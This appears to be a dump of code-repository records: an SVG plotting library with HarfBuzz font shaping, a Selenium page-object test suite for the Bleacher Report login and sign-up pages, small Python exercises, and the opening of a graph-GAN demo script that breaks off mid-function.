y2 in zip(xmins, xmaxs, ymins, ymaxs)\n ]\n\n # construct/map ticks if needed\n if xticks is None or type(xticks) is int:\n xtick_num = xticks if xticks is not None else default_nticks\n xtick_vals = np.linspace(xmin, xmax, xtick_num)\n xticks = {xmap(x): str(f'{x:.2f}') for x in xtick_vals}\n else:\n if type(xticks) is list:\n xticks = {x: str(x) for x in xticks}\n xticks = {xmap(x): t for x, t in xticks.items()}\n if yticks 
is None or type(yticks) is int:\n ytick_num = yticks if yticks is not None else default_nticks\n ytick_vals = np.linspace(ymin, ymax, ytick_num)\n yticks = {ymap(y): str(f'{y:.2f}') for y in ytick_vals}\n else:\n if type(yticks) is list:\n yticks = {y: str(y) for y in yticks}\n yticks = {ymap(y): t for y, t in yticks.items()}\n\n # create axes\n axis_args = prefix(xaxis_args, 'xaxis') | prefix(yaxis_args, 'yaxis')\n axes = Axes(xticks=xticks, yticks=yticks, aspect=aspect, **axis_args)\n\n # map lines into plot area\n lbox = (axes.anchor[0], 0, 1, axes.anchor[1])\n children = {\n ln: map_coords(lbox, cr) for ln, cr in zip(lines, coords)\n }\n children[axes] = None\n\n super().__init__(children=children, aspect=axes.aspect, **attr)\n"
},
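A minimal sketch of composing the elements defined above into a saved file; the filename is arbitrary, and note that importing the package also pulls in fonts.py, so the HarfBuzz and Fontconfig bindings must be installed even for text-free diagrams:

```python
from gum import SVG, Frame, HStack, Circle, Square

# a circle and a square side by side, wrapped in a padded, bordered frame
row = HStack([Circle(), Square()])
fig = Frame(row, padding=0.1, border=1)
SVG(fig, size=200).save('shapes.svg')
```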
{
"alpha_fraction": 0.6738544702529907,
"alphanum_fraction": 0.6738544702529907,
"avg_line_length": 32.727272033691406,
"blob_id": "7c1cfe2ba029ea2e12b7a3b4b9ba4e66da05dc23",
"content_id": "65d49cca901a4b52eb220f023f6456e3625498c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 371,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 11,
"path": "/gum/__init__.py",
"repo_name": "iamlemec/gum",
"src_encoding": "UTF-8",
"text": "from .fonts import get_text_size, get_text_shape\n\nfrom .gum import (\n prefix, pos_rect, pad_rect,\n Element, Container, Spacer, SVG,\n Box, Frame, Point, Scatter, VStack, HStack, Grid,\n Ray, VLine, HLine, Rect, Square, Ellipse, Circle, Bullet,\n Polygon, SymPath,\n Text, Emoji, TextDebug, Node,\n HTick, VTick, VScale, HScale, VAxis, HAxis, Axes, Plot\n)\n"
},
{
"alpha_fraction": 0.6312413811683655,
"alphanum_fraction": 0.6367384195327759,
"avg_line_length": 26.287500381469727,
"blob_id": "8c46ea88d12ae5b7c05fed06a201a38e680f7525",
"content_id": "8ede6aebc1921be222932bf27c4bd929fd702586",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2183,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 80,
"path": "/gum/fonts.py",
"repo_name": "iamlemec/gum",
"src_encoding": "UTF-8",
"text": "##\n## font shaping interface\n##\n\nimport gi\ngi.require_version('HarfBuzz', '0.0')\nfrom gi.repository import HarfBuzz as hb\nfrom gi.repository import GLib\n\nimport os\nimport fontconfig as fc\n\ndef get_font_path(name=''):\n conf = fc.Config.get_current()\n pat = fc.Pattern.name_parse(name)\n conf.substitute(pat, fc.FC.MatchPattern)\n pat.default_substitute()\n font, stat = conf.font_match(pat)\n path, code = font.get(fc.PROP.FILE, 0)\n return path\n\ndef get_text_shape(text, font=None, weight=None, path=None, debug=False):\n if weight is not None:\n font = f'{font}:{weight}'\n if path is None:\n path = get_font_path(font)\n\n base, ext = os.path.splitext(path)\n ext = ext[1:]\n\n with open(path, 'rb') as fid:\n fontdata = fid.read()\n\n bdata = GLib.Bytes.new(fontdata)\n blob = hb.glib_blob_create(bdata)\n face = hb.face_create(blob, 0)\n\n font = hb.font_create(face)\n upem = hb.face_get_upem(face)\n hb.font_set_scale(font, upem, upem)\n # hb.font_set_ptem(font, font_size)\n\n if ext == 'woff':\n hb.ft_font_set_funcs(font)\n\n buf = hb.buffer_create()\n hb.buffer_add_utf8(buf, text.encode('utf-8'), 0, -1)\n\n hb.buffer_guess_segment_properties(buf)\n hb.shape(font, buf, [])\n infos = hb.buffer_get_glyph_infos(buf)\n positions = hb.buffer_get_glyph_positions(buf)\n extents = [hb.font_get_glyph_extents(font, i.codepoint) for i in infos]\n\n if debug:\n return font, infos, positions, extents\n\n norm = upem\n wh_extract = lambda ext: (ext.extents.width / norm, -ext.extents.height / norm)\n\n cluster = [(i.codepoint, i.cluster) for i in infos]\n shapes = [wh_extract(e) for e in extents]\n deltas = [(p.x_advance / norm, p.y_advance / norm) for p in positions]\n offsets = [(p.x_offset / norm, p.y_offset / norm) for p in positions]\n\n return cluster, shapes, deltas, offsets\n\ndef get_text_size(text, **kwargs):\n if len(text) == 0:\n return 0, 0\n\n cluster, shapes, deltas, offsets = get_text_shape(text, **kwargs)\n\n hshapes, vshapes = zip(*shapes)\n hdeltas, vdeltas = zip(*deltas)\n\n width = sum(hdeltas)\n height = max(vshapes)\n\n return width, height\n"
}
] | 4 |
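The helpers in fonts.py resolve a font name through Fontconfig and measure shaped text with HarfBuzz; the width/height ratio they return is what Text uses as its aspect. A small sketch (whether 'Montserrat' actually resolves depends on the fonts installed on the system):

```python
from gum.fonts import get_font_path, get_text_size

print(get_font_path('Montserrat'))  # wherever Fontconfig resolves the name
w, h = get_text_size('hello', font='Montserrat', weight='Regular')
print(w / h)                        # the aspect ratio consumed by gum.Text
```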
weissbeckt/code_test | https://github.com/weissbeckt/code_test | e87a3720e1fa612bd52d09aa575496500c3abb59 | fb52f268ba8ac6b39f8e4d25807fd22882f81ce8 | dee65257bddb0ca10b0072f49e49276158e426a9 | refs/heads/master | 2020-06-12T02:29:11.952066 | 2019-06-27T22:09:54 | 2019-06-27T22:09:54 | 194167912 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5841121673583984,
"alphanum_fraction": 0.6261682510375977,
"avg_line_length": 29.571428298950195,
"blob_id": "a53cde922be2b6b118ff64c56d2234448e714407",
"content_id": "c5e469f623e018c4692520dd5705c68af2ee4cdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 214,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 7,
"path": "/bleacher_report/bleacher_report_selenium_project/src/base.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "class BasePage(object):\n\n def __init__(self, driver):\n self.driver = driver\n self.driver.implicitly_wait(20)\n self.driver.delete_all_cookies()\n self.driver.set_window_size(1280, 800)\n"
},
{
"alpha_fraction": 0.6761904954910278,
"alphanum_fraction": 0.6761904954910278,
"avg_line_length": 27.269229888916016,
"blob_id": "5ac307e75db2b1b85550389ad8eee6d73fcbb2bd",
"content_id": "a4c33503c4e5383f3b21b99db0f3bf1bd258451d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 735,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 26,
"path": "/bleacher_report/bleacher_report_selenium_project/src/home_page.spec.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom selenium import webdriver\nimport page\nimport os\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\nclass HomePageSpec(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=dir_path + '/../chromedriver')\n self.driver.get(\"http://www.bleacherreport.com\")\n\n def testHomePageDisplays(self):\n\n # Just validate home page displays\n main_page = page.HomePage(self.driver)\n assert main_page.is_title_matches(), \"Bleacher Report title doesn't match.\"\n assert main_page.is_logo_displayed(), \"Bleacher Report logo button not displayed.\"\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.6759762763977051,
"alphanum_fraction": 0.6769648790359497,
"avg_line_length": 32.99159622192383,
"blob_id": "ddf582be7c9fe0d5bfeda3a4be5993f19f959efc",
"content_id": "99f688a403664bf846c5bd8f71716f0d1e4c195b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4046,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 119,
"path": "/bleacher_report/bleacher_report_selenium_project/src/page.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "from locators import HomePageLocators, LoginPageLocators, SignUpPageLocators\nfrom base import BasePage\nimport time\n\n\nclass HomePage(BasePage):\n\n def is_title_matches(self):\n return \"Bleacher Report\" in self.driver.title\n\n def is_logo_displayed(self):\n element = self.driver.find_element(*HomePageLocators.HOME_BUTTON)\n return element.is_displayed()\n\n def select_home_button(self):\n element = self.driver.find_element(*HomePageLocators.HOME_BUTTON)\n element.click()\n\n def select_login(self):\n element = self.driver.find_element(*HomePageLocators.LOGIN_BUTTON)\n element.click()\n\n def select_sign_up(self):\n element = self.driver.find_element(*HomePageLocators.SIGN_UP_BUTTON)\n element.click()\n\n\nclass LoginPage(BasePage):\n\n def is_login_method_page_displayed(self):\n element = self.driver.find_element(*LoginPageLocators.LOGIN_METHOD_PAGE)\n return element.is_displayed()\n\n def is_email_login_page_displayed(self):\n element = self.driver.find_element(*LoginPageLocators.EMAIL_LOGIN_PAGE)\n return element.is_displayed()\n\n def select_email_login(self):\n element = self.driver.find_element(*LoginPageLocators.EMAIL_SIGN_IN)\n element.click()\n\n def input_email(self, val):\n element = self.driver.find_element(*LoginPageLocators.EMAIL_INPUT)\n element.clear()\n element.send_keys(val)\n\n def input_password(self, val):\n element = self.driver.find_element(*LoginPageLocators.PASSWORD_INPUT)\n element.clear()\n element.send_keys(val)\n\n def sign_in(self):\n element = self.driver.find_element(*LoginPageLocators.SIGN_IN)\n element.click()\n\n def is_error_message_displayed(self):\n element = self.driver.find_element(*LoginPageLocators.ERROR_MESSAGE)\n return element.is_displayed()\n\n\nclass SignUp(BasePage):\n\n def is_sign_up_page_displayed(self):\n element = self.driver.find_element(*SignUpPageLocators.SIGN_UP_PAGE)\n return element.is_displayed()\n\n def is_username_sign_up_displayed(self):\n element = self.driver.find_element(*SignUpPageLocators.USERNAME_PAGE)\n return element.is_displayed()\n\n def is_name_page_displayed(self):\n element = self.driver.find_element(*SignUpPageLocators.NAMES_PAGE)\n return element.is_displayed()\n\n def is_email_sign_up_page_displayed(self):\n element = self.driver.find_element(*SignUpPageLocators.EMAIL_SIGN_UP_PAGE)\n return element.is_displayed()\n\n def select_email_sign_up(self):\n element = self.driver.find_element(*SignUpPageLocators.SIGN_UP_WITH_EMAIL)\n element.click()\n\n def input_first_name(self, val):\n element = self.driver.find_element(*SignUpPageLocators.FIRST_NAME)\n element.clear()\n element.send_keys(val)\n\n def input_last_name(self, val):\n element = self.driver.find_element(*SignUpPageLocators.LAST_NAME)\n element.clear()\n element.send_keys(val)\n\n def input_username(self, val):\n element = self.driver.find_element(*SignUpPageLocators.USERNAME_INPUT)\n element.clear()\n element.send_keys(val)\n\n def input_email(self, val):\n element = self.driver.find_element(*SignUpPageLocators.EMAIL_INPUT)\n element.clear()\n element.send_keys(val)\n\n def input_password(self, val):\n element = self.driver.find_element(*SignUpPageLocators.PASSWORD_INPUT)\n element.clear()\n element.send_keys(val)\n\n def select_continue(self):\n # Guess the button is still clickable when it is disabled so unfortunately just made a 2 second sleep for now\n # element = WebDriverWait(self.driver, 10).until(\n # EC.element_to_be_clickable((SignUpPageLocators.CONTINUE))\n # )\n time.sleep(2)\n element = 
self.driver.find_element(*SignUpPageLocators.CONTINUE)\n element.click()\n\n def back(self):\n element = self.driver.find_element(*SignUpPageLocators.BACK)\n element.click()\n\n"
},
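The commented-out wait in select_continue hints at the intended fix for the time.sleep(2) workaround. One hedged alternative is to poll the button's enabled state explicitly instead of waiting for clickability; a sketch, reusing the locator from locators.py:

```python
from selenium.webdriver.support.ui import WebDriverWait

def select_continue(self):
    # poll up to 10s until the Continue button reports enabled, then click it
    WebDriverWait(self.driver, 10).until(
        lambda d: d.find_element(*SignUpPageLocators.CONTINUE).is_enabled()
    )
    self.driver.find_element(*SignUpPageLocators.CONTINUE).click()
```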
{
"alpha_fraction": 0.6636415123939514,
"alphanum_fraction": 0.665343165397644,
"avg_line_length": 40,
"blob_id": "47141298606d673a403914044fa7a89860ded7d4",
"content_id": "06acf0a6c27a1bbc5271f6ae35fcbaf637501743",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1763,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 43,
"path": "/bleacher_report/bleacher_report_selenium_project/src/sign_up.spec.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom selenium import webdriver\nimport page\nimport os\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\nclass LoginSpec(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=dir_path + '/../chromedriver')\n self.driver.get(\"http://www.bleacherreport.com/\")\n\n def testEmailSignUpFlow(self):\n first_name = \"first\"\n last_name = \"last\"\n dummy_user_name = \"b2lasdftds3lf3\"\n main_page = page.HomePage(self.driver)\n\n # Select sign up (Not actually creating a user in prod for you guys testing back and home buttons here as well)\n main_page.select_sign_up()\n sign_up_page = page.SignUp(self.driver)\n assert sign_up_page.is_sign_up_page_displayed(), \"Sign Up page did not display.\"\n sign_up_page.select_email_sign_up()\n assert sign_up_page.is_name_page_displayed(), \"Name input page did not display.\"\n sign_up_page.input_first_name(first_name)\n sign_up_page.input_last_name(last_name)\n sign_up_page.select_continue()\n assert sign_up_page.is_username_sign_up_displayed(), \"Username input page did not display.\"\n sign_up_page.input_username(dummy_user_name)\n sign_up_page.select_continue()\n assert sign_up_page.is_email_sign_up_page_displayed(), \"Email input page for sign up did not display.\"\n sign_up_page.back()\n assert sign_up_page.is_username_sign_up_displayed(), \"Username input page did not display after going back.\"\n main_page.select_home_button()\n assert main_page.is_logo_displayed(), \"User not navigated home after selecting home button.\"\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.49550706148147583,
"alphanum_fraction": 0.5096276998519897,
"avg_line_length": 24.129032135009766,
"blob_id": "5217f0a7d416b65df8e86aa483381aa00a748f65",
"content_id": "a408714d7db0d4daa212bda3f96d092b0f4b0f1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 779,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 31,
"path": "/bleacher_report/bleacher_report_tests/guess.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "import random\n\n\ndef main():\n guesses = 0\n hidden = random.randrange(1, 100)\n guessing(guesses, hidden)\n\n\ndef guessing(guesses, hidden):\n while True:\n guess = int(raw_input(\"Please enter your guess between 1 and 100: \"))\n guesses += 1\n if guess == hidden:\n break\n elif guess < hidden:\n print \"That guess was too low\"\n else:\n print \"That guess was too high\"\n if guess == hidden:\n play_again = raw_input(\"Congrats you nailed it, it took you this many guesses: \" + str(guesses) +\n \"\\nPlay again? (y/n): \")\n if play_again == \"y\":\n main()\n else:\n print(\"Ok Game Over\")\n exit(0)\n\n\nif __name__ == '__main__':\n main()\n"
},
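guess.py targets Python 2 (raw_input and print statements). A Python 3 sketch of the same game loop, replaying without the recursive call back into main():

```python
import random

# Python 3 rendering of the guessing game from guess.py
while True:
    hidden = random.randrange(1, 100)
    guesses = 0
    while True:
        guess = int(input("Please enter your guess between 1 and 100: "))
        guesses += 1
        if guess == hidden:
            break
        print("That guess was too low" if guess < hidden else "That guess was too high")
    if input(f"Congrats, you nailed it in {guesses} guesses! Play again? (y/n): ") != "y":
        break
```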
{
"alpha_fraction": 0.6440129280090332,
"alphanum_fraction": 0.6440129280090332,
"avg_line_length": 36.272727966308594,
"blob_id": "cf6a7be49e9e5e975b770c2ce26e1c3543204578",
"content_id": "08cfdc736149284503800dbb66327797954c131f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1236,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 33,
"path": "/bleacher_report/bleacher_report_selenium_project/src/locators.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "from selenium.webdriver.common.by import By\n\n\nclass HomePageLocators(object):\n HOME_BUTTON = (By.ID, 'br-logo')\n LOGIN_BUTTON = (By.CLASS_NAME, 'login')\n SIGN_UP_BUTTON = (By.CLASS_NAME, 'sign-up')\n\n\nclass LoginPageLocators(object):\n LOGIN_METHOD_PAGE = (By.CLASS_NAME, 'chooseLoginMethod')\n EMAIL_LOGIN_PAGE = (By.CLASS_NAME, 'emailLoginForm')\n EMAIL_SIGN_IN = (By.CLASS_NAME, 'email')\n EMAIL_INPUT = (By.NAME, 'email')\n PASSWORD_INPUT = (By.NAME, 'password')\n SIGN_IN = (By.CLASS_NAME, 'submit')\n FORGOT_PASSWORD = (By.CLASS_NAME, 'forgot')\n ERROR_MESSAGE = (By.CLASS_NAME, 'errorMessage')\n\n\nclass SignUpPageLocators(object):\n SIGN_UP_PAGE = (By.CLASS_NAME, 'signupPage')\n SIGN_UP_WITH_EMAIL = (By.CLASS_NAME, 'email')\n FIRST_NAME = (By.NAME, 'first_name')\n LAST_NAME = (By.NAME, 'last_name')\n NAMES_PAGE = (By.CLASS_NAME, 'enterYourNames')\n CONTINUE = (By.XPATH, '//button[contains(text(),\"Continue\")]')\n USERNAME_PAGE = (By.CLASS_NAME, 'pickUserName')\n USERNAME_INPUT = (By.NAME, 'username')\n EMAIL_INPUT = (By.NAME, 'email')\n PASSWORD_INPUT = (By.NAME, 'password')\n EMAIL_SIGN_UP_PAGE = (By.CLASS_NAME, 'emailSignup')\n BACK = (By.CLASS_NAME, 'flowBack')\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.8175438642501831,
"alphanum_fraction": 0.8280701637268066,
"avg_line_length": 94,
"blob_id": "eb30b5f7c668402c15a7e5323ae09a8224f828c4",
"content_id": "99259d1966c89e725e540876218c13dd3086b7b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 231,
"num_lines": 3,
"path": "/README.md",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "# code_test\nIt will require selenium to be installed\nIncluded is chromedriver for chrome version 75 under the bleacher_report_selenium_project portion of the project, replace with different version if necessary. The 3 excersises are in the bleacher_report_tests portion of the project\n"
},
{
"alpha_fraction": 0.5613811016082764,
"alphanum_fraction": 0.5843989849090576,
"avg_line_length": 29.076923370361328,
"blob_id": "e57037ac2147ff4973195e9fe1a4259d0092699e",
"content_id": "73caf39e0a87fa1ee9552979e488efd57c5d1b30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 782,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 26,
"path": "/bleacher_report/bleacher_report_tests/divisibility.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "def main():\n first = int(input(\"Enter a number between 1 and 100: \"))\n second = int(input(\"Enter another number between 1 and 100: \"))\n third = int(input(\"Enter yet another number between 1 and 100: \"))\n print \"Here are the numbers evenly divisible by at least 1 in that range for those 3 numbers (duplicates removed)\"\n print divisibility_check(first, second, third)\n\n\ndef divisibility_check(a, b, c):\n number_list = [a, b, c]\n lower = 1\n upper = 100\n results = []\n\n for i in number_list:\n for j in range(lower, upper):\n if i * j <= upper:\n result = i * j\n if result not in results:\n results.append(result)\n results.sort()\n return results\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6530958414077759,
"alphanum_fraction": 0.6530958414077759,
"avg_line_length": 31.75,
"blob_id": "4499e04bbc1b12c31b544ce3aead1b0597ce921c",
"content_id": "869868cd3f1a4f22448a1598c231869601eff604",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1179,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 36,
"path": "/bleacher_report/bleacher_report_selenium_project/src/login_spec.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom selenium import webdriver\nimport page\nimport os\ndir_path = os.path.dirname(os.path.realpath(__file__))\n\n\nclass LoginSpec(unittest.TestCase):\n\n def setUp(self):\n self.driver = webdriver.Chrome(executable_path=dir_path + '/../chromedriver')\n self.driver.get(\"http://www.bleacherreport.com\")\n\n def testLoginPage(self):\n dummy_email = \"[email protected]\"\n dummy_password = \"letmein\"\n main_page = page.HomePage(self.driver)\n\n # Navigate to login page\n main_page.select_login()\n login_page = page.LoginPage(self.driver)\n assert login_page.is_login_method_page_displayed(), \"Login method page did not display.\"\n # Navigate to login by email\n login_page.select_email_login()\n assert login_page.is_email_login_page_displayed(), \"Email login page did not display.\"\n login_page.input_email(dummy_email)\n login_page.input_password(dummy_password)\n login_page.sign_in()\n assert login_page.is_error_message_displayed(), \"Error message for login did not display.\"\n\n def tearDown(self):\n self.driver.close()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n"
},
{
"alpha_fraction": 0.6283292770385742,
"alphanum_fraction": 0.6283292770385742,
"avg_line_length": 28.5,
"blob_id": "4bf6789a4f635d4aa2a4fc40420d95a797c82323",
"content_id": "0033982b0094f18aad49b6cc0588d4257a5302e7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 826,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 28,
"path": "/bleacher_report/bleacher_report_tests/common_words.py",
"repo_name": "weissbeckt/code_test",
"src_encoding": "UTF-8",
"text": "# A few examples here of different functions to accomplish the word compare\ndef main():\n list_a = [\"trying\", \"to\", \"think\", \"of\", \"a\", \"song\", \"lyric\"]\n list_b = [\"unfortunately\", \"no\", \"lyric\", \"for\", \"any\", \"song\", \"comes\", \"to\", \"mind\"]\n print \"A few different ways to do it: \"\n print compare(list_a, list_b)\n print compare_efficiently(list_a, list_b)\n print compare_efficiently_reversed(list_a, list_b)\n\n\ndef compare(first, second):\n return list(set(first) & set(second))\n\n\ndef compare_efficiently(list_a, list_b):\n tmp = set(list_a)\n list_c = [value for value in list_b if value in tmp]\n return list_c\n\n\ndef compare_efficiently_reversed(list_a, list_b):\n tmp = set(list_b)\n list_c = [value for value in list_a if value in tmp]\n return list_c\n\n\nif __name__ == '__main__':\n main()\n"
}
] | 10 |
zeynepgurler/gGAN
|
https://github.com/zeynepgurler/gGAN
|
ee5cc0fc1c9e9ba779a2af2789e9b802207d7bce
|
07a8700376a3c8a101da4dc9dec4fccff28a36f4
|
085a315a940190f2355d1f880270e68c9ec6f56d
|
refs/heads/master
| 2022-12-19T16:11:23.500916 | 2020-10-10T07:33:38 | 2020-10-10T07:33:38 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5353962182998657,
"alphanum_fraction": 0.5506756901741028,
"avg_line_length": 38.067691802978516,
"blob_id": "0f5c0819b0a3644e1d4d2778447270a17225bbc9",
"content_id": "308ac2aef2cf6d55104f2170556733b08ec1563e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13024,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 325,
"path": "/demo.py",
"repo_name": "zeynepgurler/gGAN",
"src_encoding": "UTF-8",
"text": "import argparse\r\nimport os\r\nimport pdb\r\nimport numpy as np\r\nimport math\r\nimport itertools\r\nimport torch\r\nfrom torch.nn import Sequential, Linear, ReLU, Sigmoid, Tanh, Dropout\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn import preprocessing\r\nfrom torch_geometric.data import Data\r\nfrom torch.autograd import Variable\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\nfrom torch_geometric.nn import NNConv\r\nfrom torch_geometric.nn import BatchNorm, EdgePooling, TopKPooling, global_add_pool\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.cluster import KMeans\r\nimport matplotlib.pyplot as plt\r\nimport scipy.io\r\nimport scipy.stats as stats\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport random\r\nfrom gGAN import gGAN, netNorm\r\n\r\ntorch.cuda.empty_cache()\r\ntorch.cuda.empty_cache()\r\n\r\n# random seed\r\nmanualSeed = 1\r\n\r\nnp.random.seed(manualSeed)\r\nrandom.seed(manualSeed)\r\ntorch.manual_seed(manualSeed)\r\n\r\nif torch.cuda.is_available():\r\n device = torch.device('cuda')\r\n print('running on GPU')\r\n # if you are using GPU\r\n torch.cuda.manual_seed(manualSeed)\r\n torch.cuda.manual_seed_all(manualSeed)\r\n\r\n torch.backends.cudnn.enabled = False\r\n torch.backends.cudnn.benchmark = False\r\n torch.backends.cudnn.deterministic = True\r\n\r\nelse:\r\n device = torch.device(\"cpu\")\r\n print('running on CPU')\r\n\r\n\r\ndef demo():\r\n def cast_data(array_of_tensors, version):\r\n version1 = torch.tensor(version, dtype=torch.int)\r\n\r\n N_ROI = array_of_tensors[0].shape[0]\r\n CHANNELS = 1\r\n dataset = []\r\n edge_index = torch.zeros(2, N_ROI * N_ROI)\r\n edge_attr = torch.zeros(N_ROI * N_ROI, CHANNELS)\r\n x = torch.zeros((N_ROI, N_ROI)) # 35 x 35\r\n y = torch.zeros((1,))\r\n\r\n counter = 0\r\n for i in range(N_ROI):\r\n for j in range(N_ROI):\r\n edge_index[:, counter] = torch.tensor([i, j])\r\n counter += 1\r\n for mat in array_of_tensors: # 1,35,35,4\r\n\r\n if version1 == 0:\r\n edge_attr = mat.view(1225, 1)\r\n x = mat.view(nbr_of_regions, nbr_of_regions)\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n elif version1 == 1:\r\n edge_attr = torch.randn(N_ROI * N_ROI, CHANNELS)\r\n x = torch.randn(N_ROI, N_ROI) # 35 x 35\r\n edge_index = torch.tensor(edge_index, dtype=torch.long)\r\n edge_attr = torch.tensor(edge_attr, dtype=torch.float)\r\n x = torch.tensor(x, dtype=torch.float)\r\n data = Data(x=x, edge_index=edge_index, edge_attr=edge_attr)\r\n dataset.append(data)\r\n\r\n return dataset\r\n\r\n #####################################################################################################\r\n\r\n def linear_features(data):\r\n n_roi = data[0].shape[0]\r\n n_sub = data.shape[0]\r\n counter = 0\r\n\r\n num_feat = (n_roi * (n_roi - 1) // 2)\r\n final_data = np.empty([n_sub, num_feat], dtype=float)\r\n for k in range(n_sub):\r\n for i in range(n_roi):\r\n for j in range(i+1, n_roi):\r\n final_data[k, counter] = data[k, i, j]\r\n counter += 1\r\n counter = 0\r\n\r\n return final_data\r\n\r\n def make_sym_matrix(nbr_of_regions, feature_vector):\r\n sym_matrix = np.zeros([9, feature_vector.shape[1], nbr_of_regions, nbr_of_regions], dtype=np.double)\r\n for j in range(9):\r\n for i in range(feature_vector.shape[1]):\r\n my_matrix = np.zeros([nbr_of_regions, nbr_of_regions], 
dtype=np.double)\r\n\r\n my_matrix[np.triu_indices(nbr_of_regions, k=1)] = feature_vector[j, i, :]\r\n my_matrix = my_matrix + my_matrix.T\r\n my_matrix[np.diag_indices(nbr_of_regions)] = 0\r\n sym_matrix[j, i,:,:] = my_matrix\r\n\r\n return sym_matrix\r\n\r\n def plot_predictions(predicted, fold):\r\n plt.clf()\r\n for j in range(predicted.shape[0]):\r\n for i in range(predicted.shape[1]):\r\n predicted_sub = predicted[j, i, :, :]\r\n plt.pcolor(abs(predicted_sub))\r\n if(j == 0 and i == 0):\r\n plt.colorbar()\r\n plt.imshow(predicted_sub)\r\n plt.savefig('./plot/img' + str(fold) + str(j) + str(i) + '.png')\r\n\r\n def plot_MAE(prediction, data_next, test, fold):\r\n # mae\r\n MAE = np.zeros((9), dtype=np.double)\r\n for i in range(9):\r\n MAE_i = abs(prediction[i, :, :] - data_next[test])\r\n MAE[i] = np.mean(MAE_i)\r\n\r\n plt.clf()\r\n k = ['k=2', 'k=3', 'k=4', 'k=5', 'k=6', 'k=7', 'k=8', 'k=9', 'k=10']\r\n sns.set(style=\"whitegrid\")\r\n\r\n df = pd.DataFrame(dict(x=k, y=MAE))\r\n # total = sns.load_dataset('tips')\r\n ax = sns.barplot(x=\"x\", y=\"y\", data=df)\r\n min = MAE.min() - 0.01\r\n max = MAE.max() + 0.01\r\n ax.set(ylim=(min, max))\r\n plt.savefig('./plot/mae' + str(fold) + '.png')\r\n\r\n ######################################################################################################################################\r\n\r\n class Generator(nn.Module):\r\n def __init__(self):\r\n super(Generator, self).__init__()\r\n\r\n nn = Sequential(Linear(1, 1225), ReLU())\r\n self.conv1 = NNConv(35, 35, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv11 = BatchNorm(35, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, 35), ReLU())\r\n self.conv2 = NNConv(35, 1, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv22 = BatchNorm(1, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, 35), ReLU())\r\n self.conv3 = NNConv(1, 35, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv33 = BatchNorm(35, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n\r\n\r\n def forward(self, data):\r\n x, edge_index, edge_attr 